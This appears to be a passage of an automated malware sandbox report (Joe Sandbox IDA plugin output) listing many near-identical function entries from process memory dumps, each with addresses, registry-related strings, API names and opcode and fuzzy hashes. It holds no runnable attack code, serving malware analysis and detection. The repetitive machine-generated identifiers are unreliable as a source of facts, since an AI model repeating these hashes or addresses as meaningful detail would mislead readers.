                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: bfd4d7c23c0b7adf3137a3b763528e200069e4440a80c3d59950c302005c2d69
                    • Instruction ID: 08842ea5986aab74ab62d003b659cb0a2536b629024817f39d26b5f7c611f187
                    • Opcode Fuzzy Hash: bfd4d7c23c0b7adf3137a3b763528e200069e4440a80c3d59950c302005c2d69
                    • Instruction Fuzzy Hash: CBF02422A0820A42EA929F88FC413B97344BF847E4F080236EF4C466D2EF3DD989C300
                    Function 00007FF8BFB8D8DD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 915b2df0735b1b4a45862a718138cf0af1dd01a469394c247dcd6d9b00ff717d
                    • Instruction ID: df10cc15b72600465b6a6392655c3e9b3b17ac6780dc0cb35f3fc2f4316ce350
                    • Opcode Fuzzy Hash: 915b2df0735b1b4a45862a718138cf0af1dd01a469394c247dcd6d9b00ff717d
                    • Instruction Fuzzy Hash: 29F02422B0830A42EA929F88F8413B97344BF847E4F080236EF4D466D2EF3DD989C300
                    Function 00007FF8BFB8D9F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 14a6f1e05bd0c348ba73e5c5846f41afe97600fefa0b9d78abdf6e0ac06ac377
                    • Instruction ID: a3e958735eb5bca3f5a36b5a9bec07b7e5c898fa3721481621927c0536bb929b
                    • Opcode Fuzzy Hash: 14a6f1e05bd0c348ba73e5c5846f41afe97600fefa0b9d78abdf6e0ac06ac377
                    • Instruction Fuzzy Hash: 27F0B462A0874A42EA92DF88F8417B97354BF847E4F084236EF5D466D6EF3DD989D300
                    Function 00007FF8BFB8D97C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 3ef084da799f0a33023c652117027e69e8e15d24725d31172a4b0d0595537e04
                    • Instruction ID: ce2401481d2fc149593c84d06ba7031b2549e4e5465f5b3b382b54af925bbccc
                    • Opcode Fuzzy Hash: 3ef084da799f0a33023c652117027e69e8e15d24725d31172a4b0d0595537e04
                    • Instruction Fuzzy Hash: 9CF02B2260830A42E5529F88F8413B97344BF847E4F080137DF4D466D1DF3DD985C300
                    Function 00007FF8BFB8D96E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 7b4dabeff1d3f2b3154452b78c37af8fb2a924e4141310c203bccd55459aa073
                    • Instruction ID: 3c4d095f3d8c9005d2e9ac2234a5357b54c78f9a33c32730250a648b2c0292d4
                    • Opcode Fuzzy Hash: 7b4dabeff1d3f2b3154452b78c37af8fb2a924e4141310c203bccd55459aa073
                    • Instruction Fuzzy Hash: 66F0F62260820A42E5529F88F8413B97344BF847E4F080136DF4D46691DF2DD985C300
                    Function 00007FF8B915B418 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 29437ac4afbfda1d0549fadbdcd205bb5e1de10d9f53cd31b8a2290d1309ccbd
                    • Instruction ID: 74429e1f76944a5e09356b704ab23aa6a6212c393a85389d950b6235482401ca
                    • Opcode Fuzzy Hash: 29437ac4afbfda1d0549fadbdcd205bb5e1de10d9f53cd31b8a2290d1309ccbd
                    • Instruction Fuzzy Hash: 39F09662A1878642E5528F18F8403756254FF447E4F198236DF4D87690EF2CF989F700
                    Function 00007FF8B915B2FD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: cace5ebabb9363b8966dec080f45c5113ce0fff2ffdb2ee5c196495c6adaa64c
                    • Instruction ID: 4a759241da14da64db076c28c99972bda0f9c313e3dd72f4964756aec9ee2d21
                    • Opcode Fuzzy Hash: cace5ebabb9363b8966dec080f45c5113ce0fff2ffdb2ee5c196495c6adaa64c
                    • Instruction Fuzzy Hash: 80F09062A1878A82E5528F18B8403B96254FF457E4F598236EF4D87690EF2CF989E700
                    Function 00007FF8B915B307 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 94c313a93f3fcc94334b073feae1166a67dda0c898543ef0da23008a7acd5d45
                    • Instruction ID: 3aec7a6c73b3824081ee5b6c46e0b6d8796d8e6b23bdcbb4fede6599e1dd3204
                    • Opcode Fuzzy Hash: 94c313a93f3fcc94334b073feae1166a67dda0c898543ef0da23008a7acd5d45
                    • Instruction Fuzzy Hash: 02F09062A1878A82E5528F18FC403B96254FF457E4F598236EF4D87690EF2CF989A700
                    Function 00007FF8B915B39C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: a6dc7d9a45d4f0885938b8d6bee443f9b6c71ed4e1913be312bb925606633a80
                    • Instruction ID: ba3e34913068421b90eb1d7be8f986b3289a8f101b106263f7b56e494a9a344a
                    • Opcode Fuzzy Hash: a6dc7d9a45d4f0885938b8d6bee443f9b6c71ed4e1913be312bb925606633a80
                    • Instruction Fuzzy Hash: C6F09062A1878A82E5528F18B8403B96254FF457E4F598236EF4D87690EF2CF989E700
                    Function 00007FF8B915B38E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 43a66c7a40e50f2705813a1cfc1b0f86665661e007711cb612dbde3ccfe57ede
                    • Instruction ID: 100a31e855ac35467210143eb3b9aa4aaf5623f089f314565573440b2f2f62bd
                    • Opcode Fuzzy Hash: 43a66c7a40e50f2705813a1cfc1b0f86665661e007711cb612dbde3ccfe57ede
                    • Instruction Fuzzy Hash: 04F09662A1878642E5538F18BC403796254FF457E4F598236DF4D87690EF2CF985E700
                    Function 00007FF8BFAB80EE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 4431de4f8124a7a94acb3b6e3692c454a9cb3ecc2e31de966fdae785209df37a
                    • Instruction ID: eef4070d774a0e3ff1dbb1ae9263f11ce3c6cf47ec5e530c2be01453ede4519c
                    • Opcode Fuzzy Hash: 4431de4f8124a7a94acb3b6e3692c454a9cb3ecc2e31de966fdae785209df37a
                    • Instruction Fuzzy Hash: 52F0F62260CB0A41E5569F8CBC423B5A358EF447DDF041236DF2D466D1DF3DD98A9300
                    Function 00007FF8BFAB8067 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 7ce75c16e399c1183033e576a59c15f89c45a6ed3088f81472bba314161fe703
                    • Instruction ID: c90c0b90fc821935a9f645509f75f1b788668e2aa7f0b448039d458b528eef7e
                    • Opcode Fuzzy Hash: 7ce75c16e399c1183033e576a59c15f89c45a6ed3088f81472bba314161fe703
                    • Instruction Fuzzy Hash: A2F0F62260CB0A41E5569F8CBC423B5A358BF447DDF041236DF2C466D1DF3DD98A9300
                    Function 00007FF8BFAB805D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 595959e12e0d8d791a9631b33b262330948874470473a6cf288e0f8731749f32
                    • Instruction ID: d09650fc0ac4feb6b3c32af8598c7bfac8fa19dea34ce169704de77c22a2ef5c
                    • Opcode Fuzzy Hash: 595959e12e0d8d791a9631b33b262330948874470473a6cf288e0f8731749f32
                    • Instruction Fuzzy Hash: F6F0F62260CB0A45E5569F8CBC423B5A358AF447DDF041236DF2D466D1EF3DD98A9300
                    Function 00007FF8BFAB8178 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: 8b6597c3c96ecf1030993586f09daf402de802ff915c0124a2dd22e0bd7580e4
                    • Instruction ID: 57000f02178794721eb85fa1795b10a0b2edc10302aaa885fdbb47284aad253c
                    • Opcode Fuzzy Hash: 8b6597c3c96ecf1030993586f09daf402de802ff915c0124a2dd22e0bd7580e4
                    • Instruction Fuzzy Hash: 6AF0F62260CB0A41E5569F8CBC423B5A358BF447DDF081236DF6D466D1DF3DD98A9300
                    Function 00007FF8BFAB80FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: f5e9a1a5a4fa95b997aadb3c19c1bfd70e8aa5bab72be4b72225d5cd458617d4
                    • Instruction ID: d9e87bf38dd85c83f857e9b8d3508449dc46c98c581fb0c783e0d7da91559868
                    • Opcode Fuzzy Hash: f5e9a1a5a4fa95b997aadb3c19c1bfd70e8aa5bab72be4b72225d5cd458617d4
                    • Instruction Fuzzy Hash: 6AF0F62260CB0A42E5569FCCBC423B5A358AF447DDF041236DF2D466D1DF3DD98A9700
                    Function 00007FF8BA50891D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: df9030146c483eeb1c42cd23e8c33ca0e0a20dd8f7b5618f4459904781ca7a31
                    • Instruction ID: c812bb573956c658634088bc6e4d75ac5a506c9f6f57d2c59da15610f4592840
                    • Opcode Fuzzy Hash: df9030146c483eeb1c42cd23e8c33ca0e0a20dd8f7b5618f4459904781ca7a31
                    • Instruction Fuzzy Hash: 89F09C5260C70692E5619F88BC807B67354AF467D5F480276DF4D466A0EF3DDB499300
                    Function 00007FF8BA508927 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: Closefflushfwrite
                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                    • API String ID: 1001908780-1680961811
                    • Opcode ID: d70ce53f65cbd76b3d812b6a3b7d7fa9ae657fd1b9d78e245efc284ed06115be
                    • Instruction ID: dae321e5793c3cbfa36ebce0a2f62fa308e3d1037e5e4e324bdb60768ef8a0a0
                    • Opcode Fuzzy Hash: d70ce53f65cbd76b3d812b6a3b7d7fa9ae657fd1b9d78e245efc284ed06115be
                    • Instruction Fuzzy Hash: C6F09C5260C60692E5619F88BC807B67354BF467D4F480176DF4D466A0EF3DDB499300
                    Function 00007FF8BA5089BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
